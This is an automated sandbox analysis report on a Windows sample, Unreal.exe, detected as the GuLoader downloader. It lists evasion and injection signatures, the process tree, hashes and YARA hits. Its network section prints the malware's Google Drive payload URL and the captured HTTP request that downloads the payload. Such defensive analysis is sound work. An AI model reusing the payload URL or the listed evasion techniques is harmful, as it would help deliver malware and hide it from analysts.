Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report Unreal.exe

Overview

General Information

Sample Name:Unreal.exe
Analysis ID:1369
MD5:35a93d1f2edc044b3d8289abfeb17a43
SHA1:c29f2524ae4bd239c849720b1fc6ce5c13bee93b
SHA256:88d3b3a6564e25b63b31f4a00361384fd294f228763b3bde4e3162144971d385
Infos:

Most interesting Screenshot:

Detection

GuLoader
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
GuLoader behavior detected
Yara detected GuLoader
Hides threads from debuggers
Writes to foreign memory regions
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Creates a DirectInput object (often for capturing keystrokes)
Drops files with a non-matching file extension (content does not match file extension)
PE file does not import any functions
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Enables security privileges
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64native
  • Unreal.exe (PID: 9076 cmdline: 'C:\Users\user\Desktop\Unreal.exe' MD5: 35A93D1F2EDC044B3D8289ABFEB17A43)
    • RegAsm.exe (PID: 6940 cmdline: 'C:\Users\user\Desktop\Unreal.exe' MD5: A64DACA3CFBCD039DF3EC29D3EDDD001)
    • RegAsm.exe (PID: 7508 cmdline: 'C:\Users\user\Desktop\Unreal.exe' MD5: A64DACA3CFBCD039DF3EC29D3EDDD001)
      • conhost.exe (PID: 7772 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • WerFault.exe (PID: 3384 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7508 -s 828 MD5: 40A149513D721F096DDF50C04DA2F01F)
  • mpam-20b5c938.exe (PID: 6140 cmdline: 'C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-20b5c938.exe' /q WD MD5: 4CF0EA82FA547953BAA24CEB4AFDE935)
    • MpSigStub.exe (PID: 9104 cmdline: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exe /stub 1.1.18500.10 /payload 1.349.1496.0 /program C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\mpam-20b5c938.exe /q WD MD5: 01F92DC7A766FF783AE7AF40FD0334FB)
  • wevtutil.exe (PID: 5464 cmdline: C:\Windows\system32\wevtutil.exe uninstall-manifest C:\Windows\TEMP\A491FE0B-CBB3-0812-A9E9-28E6069853FA.man MD5: C57C1292650B6384903FE6408D412CFA)
    • conhost.exe (PID: 8100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • wevtutil.exe (PID: 6516 cmdline: C:\Windows\system32\wevtutil.exe install-manifest C:\Windows\TEMP\A491FE0B-CBB3-0812-A9E9-28E6069853FA.man '/resourceFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/messageFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' '/parameterFilePath:C:\ProgramData\Microsoft\Windows Defender\Definition Updates\StableEngineEtwLocation\mpengine_etw.dll' MD5: C57C1292650B6384903FE6408D412CFA)
    • conhost.exe (PID: 3060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=dow"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.5646431545.0000000000D50000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000008.00000000.5536067468.0000000000D50000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      00000008.00000000.5526072916.0000000000D50000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

        Sigma Overview

        No Sigma rule has matched

        Jbx Signature Overview

        Click to jump to signature section

        Show All Signature Results

        AV Detection:

        barindex
        Found malware configurationShow sources
        Source: Unreal.exeMalware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=dow"}
        Multi AV Scanner detection for submitted fileShow sources
        Source: Unreal.exeReversingLabs: Detection: 13%
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E2C1C4 CreateDirectoryW,FreeLibrary,DecryptFileW,FreeLibrary,FreeLibrary,
        Source: Unreal.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
        Source: unknownHTTPS traffic detected: 142.250.185.142:443 -> 192.168.11.20:49763 version: TLS 1.2
        Source: Binary string: rsaenh.pdb source: WerFault.exe, 0000000C.00000003.5585066686.00000000069F8000.00000004.00000001.sdmp
        Source: Binary string: CLBCatQ.pdb( source: WerFault.exe, 0000000C.00000003.5557061554.0000000005D84000.00000004.00000001.sdmp
        Source: Binary string: cfgmgr32.pdb( source: WerFault.exe, 0000000C.00000003.5552355608.0000000002833000.00000004.00000001.sdmp
        Source: Binary string: ncryptsslp.pdb1I source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: profapi.pdb( source: WerFault.exe, 0000000C.00000003.5571125548.0000000005D73000.00000004.00000001.sdmp
        Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000C.00000003.5551962205.00000000027F4000.00000004.00000001.sdmp
        Source: Binary string: sfc_os.pdb source: WerFault.exe, 0000000C.00000003.5562290340.000000000597C000.00000004.00000001.sdmp
        Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: mskeyprotect.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000C.00000003.5609465686.00000000049A0000.00000004.00000040.sdmp
        Source: Binary string: RegAsm.pdb source: WerFault.exe, 0000000C.00000003.5609368577.00000000049D1000.00000004.00000001.sdmp
        Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000C.00000003.5550085829.000000000278F000.00000004.00000001.sdmp
        Source: Binary string: winnsi.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: cryptsp.pdb source: WerFault.exe, 0000000C.00000003.5590237847.000000000699B000.00000004.00000001.sdmp
        Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000C.00000003.5559519325.0000000005D62000.00000004.00000001.sdmp
        Source: Binary string: ucrtbase.pdb( source: WerFault.exe, 0000000C.00000003.5554021670.000000000282C000.00000004.00000001.sdmp
        Source: Binary string: bcrypt.pdb( source: WerFault.exe, 0000000C.00000003.5560045007.0000000002839000.00000004.00000001.sdmp
        Source: Binary string: qncryptsslp.pdb source: WerFault.exe, 0000000C.00000003.5574373177.0000000006349000.00000004.00000001.sdmp
        Source: Binary string: msi.pdb source: WerFault.exe, 0000000C.00000003.5555988282.000000000598D000.00000004.00000001.sdmp
        Source: Binary string: CLBCatQ.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: schannel.pdb source: WerFault.exe, 0000000C.00000003.5579000492.0000000006587000.00000004.00000001.sdmp
        Source: Binary string: urlmon.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: winspool.pdb( source: WerFault.exe, 0000000C.00000003.5553326030.0000000005977000.00000004.00000001.sdmp
        Source: Binary string: MpSigStub.pdbGCTL source: mpam-20b5c938.exe, 00000017.00000003.6155056829.000001C6B5161000.00000004.00000001.sdmp, MpSigStub.exe, 00000018.00000003.6173396179.0000025A7B313000.00000004.00000001.sdmp, MpSigStub.exe.23.dr
        Source: Binary string: WLDP.pdb( source: WerFault.exe, 0000000C.00000003.5563888052.0000000005D6E000.00000004.00000001.sdmp
        Source: Binary string: sfc_os.pdb( source: WerFault.exe, 0000000C.00000003.5562290340.000000000597C000.00000004.00000001.sdmp
        Source: Binary string: advapi32.pdb6X source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000C.00000003.5551996504.00000000027FA000.00000004.00000001.sdmp
        Source: Binary string: mpr.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: shcore.pdb@X source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: bcryptprimitives.pdb( source: WerFault.exe, 0000000C.00000003.5557034969.0000000005D7F000.00000004.00000001.sdmp
        Source: Binary string: cryptbase.pdb( source: WerFault.exe, 0000000C.00000003.5590481067.0000000006A53000.00000004.00000001.sdmp
        Source: Binary string: RegAsm.pdb( source: WerFault.exe, 0000000C.00000003.5554127676.000000000276B000.00000004.00000001.sdmp
        Source: Binary string: cryptsp.pdb( source: WerFault.exe, 0000000C.00000003.5590237847.000000000699B000.00000004.00000001.sdmp
        Source: Binary string: srvcli.pdb source: WerFault.exe, 0000000C.00000003.5579678253.00000000064BF000.00000004.00000001.sdmp
        Source: Binary string: mscoree.pdb source: WerFault.exe, 0000000C.00000003.5550573742.0000000002794000.00000004.00000001.sdmp
        Source: Binary string: ws2_32.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: advapi32.pdb( source: WerFault.exe, 0000000C.00000003.5553459243.0000000005993000.00000004.00000001.sdmp
        Source: Binary string: winspool.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: gpapi.pdb( source: WerFault.exe, 0000000C.00000003.5555030899.0000000006AAD000.00000004.00000001.sdmp
        Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000C.00000003.5558896267.0000000005D9B000.00000004.00000001.sdmp
        Source: Binary string: iphlpapi.pdb=I source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: dpapi.pdb( source: WerFault.exe, 0000000C.00000003.5590924536.00000000065A3000.00000004.00000001.sdmp
        Source: Binary string: wmswsock.pdb( source: WerFault.exe, 0000000C.00000003.5579261146.0000000005D95000.00000004.00000001.sdmp
        Source: Binary string: nsi.pdb source: WerFault.exe, 0000000C.00000003.5609368577.00000000049D1000.00000004.00000001.sdmp
        Source: Binary string: wrpcrt4.pdb( source: WerFault.exe, 0000000C.00000003.5552657974.000000000523E000.00000004.00000001.sdmp
        Source: Binary string: gpapi.pdb source: WerFault.exe, 0000000C.00000003.5555030899.0000000006AAD000.00000004.00000001.sdmp
        Source: Binary string: rsaenh.pdb( source: WerFault.exe, 0000000C.00000003.5585066686.00000000069F8000.00000004.00000001.sdmp
        Source: Binary string: wwin32u.pdb( source: WerFault.exe, 0000000C.00000003.5553896637.0000000002816000.00000004.00000001.sdmp
        Source: Binary string: ole32.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: AcLayers.pdb source: WerFault.exe, 0000000C.00000003.5609465686.00000000049A0000.00000004.00000040.sdmp
        Source: Binary string: iertutil.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: CLBCatQ.pdb.X source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: msasn1.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: ws2_32.pdb"X source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: rasadhlp.pdb( source: WerFault.exe, 0000000C.00000003.5578930131.000000000657C000.00000004.00000001.sdmp
        Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000C.00000003.5556924766.0000000005D68000.00000004.00000001.sdmp
        Source: Binary string: combase.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: wininet.pdbLX source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: wuser32.pdb( source: WerFault.exe, 0000000C.00000003.5553864316.0000000002810000.00000004.00000001.sdmp
        Source: Binary string: iertutil.pdb( source: WerFault.exe, 0000000C.00000003.5560528570.0000000005D57000.00000004.00000001.sdmp
        Source: Binary string: wkernel32.pdb( source: WerFault.exe, 0000000C.00000003.5551962205.00000000027F4000.00000004.00000001.sdmp
        Source: Binary string: sfc.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: ncrypt.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: dpapi.pdb source: WerFault.exe, 0000000C.00000003.5590924536.00000000065A3000.00000004.00000001.sdmp
        Source: Binary string: profapi.pdbTX source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000C.00000003.5609465686.00000000049A0000.00000004.00000040.sdmp
        Source: Binary string: ole32.pdb( source: WerFault.exe, 0000000C.00000003.5569202232.000000000599E000.00000004.00000001.sdmp
        Source: Binary string: shcore.pdb( source: WerFault.exe, 0000000C.00000003.5563767171.0000000005D5D000.00000004.00000001.sdmp
        Source: Binary string: rasadhlp.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: netutils.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: msvcp_win.pdb( source: WerFault.exe, 0000000C.00000003.5552283718.0000000002827000.00000004.00000001.sdmp
        Source: Binary string: WLDP.pdbZX source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: iertutil.pdbFX source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: wininet.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: Kernel.Appcore.pdb( source: WerFault.exe, 0000000C.00000003.5573477863.0000000005D79000.00000004.00000001.sdmp
        Source: Binary string: wgdi32full.pdb( source: WerFault.exe, 0000000C.00000003.5553966425.0000000002821000.00000004.00000001.sdmp
        Source: Binary string: shell32.pdb( source: WerFault.exe, 0000000C.00000003.5553602111.0000000005228000.00000004.00000001.sdmp
        Source: Binary string: MpAdlStub.pdb source: mpam-20b5c938.exe, 00000017.00000000.6138920683.00007FF7EC2AF000.00000002.00020000.sdmp
        Source: Binary string: shcore.pdb source: WerFault.exe, 0000000C.00000003.5563767171.0000000005D5D000.00000004.00000001.sdmp
        Source: Binary string: ncryptsslp.pdb( source: WerFault.exe, 0000000C.00000003.5595558950.0000000006B6A000.00000004.00000001.sdmp
        Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: oleaut32.pdb( source: WerFault.exe, 0000000C.00000003.5557732587.0000000005233000.00000004.00000001.sdmp
        Source: Binary string: ck.pdb) source: WerFault.exe, 0000000C.00000003.5565025438.0000000005F5B000.00000004.00000001.sdmp
        Source: Binary string: MpClient.pdb source: MpSigStub.exe, 00000018.00000003.6171462961.0000025A7B312000.00000004.00000001.sdmp
        Source: Binary string: ntasn1.pdb7I source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: shell32.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: schannel.pdb( source: WerFault.exe, 0000000C.00000003.5579000492.0000000006587000.00000004.00000001.sdmp
        Source: Binary string: dnsapi.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: wimm32.pdb( source: WerFault.exe, 0000000C.00000003.5564336996.0000000005982000.00000004.00000001.sdmp
        Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: rasadhlp.pdboJ source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: winnsi.pdb( source: WerFault.exe, 0000000C.00000003.5579357046.0000000005DA6000.00000004.00000001.sdmp
        Source: Binary string: sechost.pdbxX source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: setupapi.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: winhttp.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: Windows.Storage.pdb( source: WerFault.exe, 0000000C.00000003.5556924766.0000000005D68000.00000004.00000001.sdmp
        Source: Binary string: msi.pdb( source: WerFault.exe, 0000000C.00000003.5555988282.000000000598D000.00000004.00000001.sdmp
        Source: Binary string: ntasn1.pdb source: WerFault.exe, 0000000C.00000003.5569029216.0000000006592000.00000004.00000001.sdmp
        Source: Binary string: fwpuclnt.pdb( source: WerFault.exe, 0000000C.00000003.5570732197.0000000006581000.00000004.00000001.sdmp
        Source: Binary string: OnDemandConnRouteHelper.pdb source: WerFault.exe, 0000000C.00000003.5568021975.0000000006245000.00000004.00000001.sdmp
        Source: Binary string: MpSigStub.pdb source: mpam-20b5c938.exe, 00000017.00000003.6155056829.000001C6B5161000.00000004.00000001.sdmp, MpSigStub.exe, 00000018.00000003.6173396179.0000025A7B313000.00000004.00000001.sdmp, MpSigStub.exe.23.dr
        Source: Binary string: ole32.pdbrX source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: combase.pdb( source: WerFault.exe, 0000000C.00000003.5552632966.0000000005239000.00000004.00000001.sdmp
        Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000000C.00000003.5550085829.000000000278F000.00000004.00000001.sdmp
        Source: Binary string: profapi.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: WLDP.pdb source: WerFault.exe, 0000000C.00000003.5563888052.0000000005D6E000.00000004.00000001.sdmp
        Source: Binary string: wsspicli.pdb<X source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: sechost.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: setupapi.pdb0X source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: ncryptsslp.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: wmswsock.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: wintrust.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: mskeyprotect.pdb# source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: crypt32.pdb( source: WerFault.exe, 0000000C.00000003.5586901895.0000000006598000.00000004.00000001.sdmp
        Source: Binary string: dnsapi.pdb( source: WerFault.exe, 0000000C.00000003.5581399598.0000000006576000.00000004.00000001.sdmp
        Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: AcLayers.pdb( source: WerFault.exe, 0000000C.00000003.5552064732.0000000002805000.00000004.00000001.sdmp
        Source: Binary string: ntasn1.pdb( source: WerFault.exe, 0000000C.00000003.5569029216.0000000006592000.00000004.00000001.sdmp
        Source: Binary string: srvcli.pdb( source: WerFault.exe, 0000000C.00000003.5579678253.00000000064BF000.00000004.00000001.sdmp
        Source: Binary string: psapi.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: fwpuclnt.pdb source: WerFault.exe, 0000000C.00000003.5570732197.0000000006581000.00000004.00000001.sdmp
        Source: Binary string: ws2_32.pdb( source: WerFault.exe, 0000000C.00000003.5559728887.0000000005D8A000.00000004.00000001.sdmp
        Source: Binary string: MpAdlStub.pdbGCTL source: mpam-20b5c938.exe, 00000017.00000000.6138920683.00007FF7EC2AF000.00000002.00020000.sdmp
        Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000C.00000003.5590481067.0000000006A53000.00000004.00000001.sdmp
        Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000000C.00000003.5551996504.00000000027FA000.00000004.00000001.sdmp
        Source: Binary string: OnDemandConnRouteHelper.pdb( source: WerFault.exe, 0000000C.00000003.5568021975.0000000006245000.00000004.00000001.sdmp
        Source: Binary string: MpClient.pdbGCTL source: MpSigStub.exe, 00000018.00000003.6171462961.0000025A7B312000.00000004.00000001.sdmp
        Source: Binary string: iphlpapi.pdb( source: WerFault.exe, 0000000C.00000003.5558896267.0000000005D9B000.00000004.00000001.sdmp
        Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: winspool.pdb(X source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000C.00000003.5553864316.0000000002810000.00000004.00000001.sdmp
        Source: Binary string: wininet.pdb( source: WerFault.exe, 0000000C.00000003.5553538636.00000000059A4000.00000004.00000001.sdmp
        Source: Binary string: crypt32.pdb source: WerFault.exe, 0000000C.00000003.5609518898.00000000049A8000.00000004.00000040.sdmp
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E2B030 FindNextFileW,FindClose,FindFirstFileW,
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E2ADEC FindFirstFileW,FindNextFileW,FindClose,FindClose,
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742E52504 FindFirstFileExW,FindNextFileW,FindClose,FindClose,
        Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\029C0225-A9FE-4247-9FEB-6A4C69D031CD\MpSigStub.exeCode function: 24_2_00007FF742DDF810 FindFirstFileW,FindNextFileW,FindClose,CloseHandle,CloseHandle,

        Networking:

        barindex
        C2 URLs / IPs found in malware configurationShow sources
        Source: Malware configuration extractorURLs: https://drive.google.com/uc?export=dow
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1JZajQIQdUbLIFKGrWeKAj7F2g5cgApuC HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
        Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8x-chromium-appcache-fallback-override: disallow-fallbackP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: script-src 'nonce-MIVbPGF4ZuXsZ2NZTTzVEQ' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/Date: Mon, 27 Sep 2021 14:33:04 GMTExpires: Mon, 27 Sep 2021 14:33:04 GMTCache-Control: private, max-age=0X-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockServer: GSESet-Cookie: NID=511=kWh_xUioAXmCXt6QIW6Mm4DtzPI9_fAr2WiFKEmXPAjZvuWqXj1I7phnbwK5qVZOA3KA2Dwc9IGtRHUtfxRy-aBcUQZ4zKf-uCz414_kuMrvIGUe_DgGauW80ouL5dhtM9v6jgmzo75QoUqo2k6HSanF5BaWh7W1UvFmn1Szn94; expires=Tue, 29-Mar-2022 14:33:04 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"Accept-Ranges: noneVary: Accept-EncodingConnection: closeTransfer-Encoding: chunked
        Source: RegAsm.exe, 00000008.00000000.5527652097.0000000001197000.00000004.00000020.sdmp, WerFault.exe, 0000000C.00000002.5644218565.0000000005978000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
        Source: RegAsm.exe, 00000008.00000000.5527652097.0000000001197000.00000004.00000020.sdmp, WerFault.exe, 0000000C.00000002.5644218565.0000000005978000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: RegAsm.exe, 00000008.00000003.3163191728.0000000001197000.00000004.00000001.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/
        Source: RegAsm.exe, 00000008.00000000.5537128570.0000000001173000.00000004.00000020.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/drive-explorer/Qe
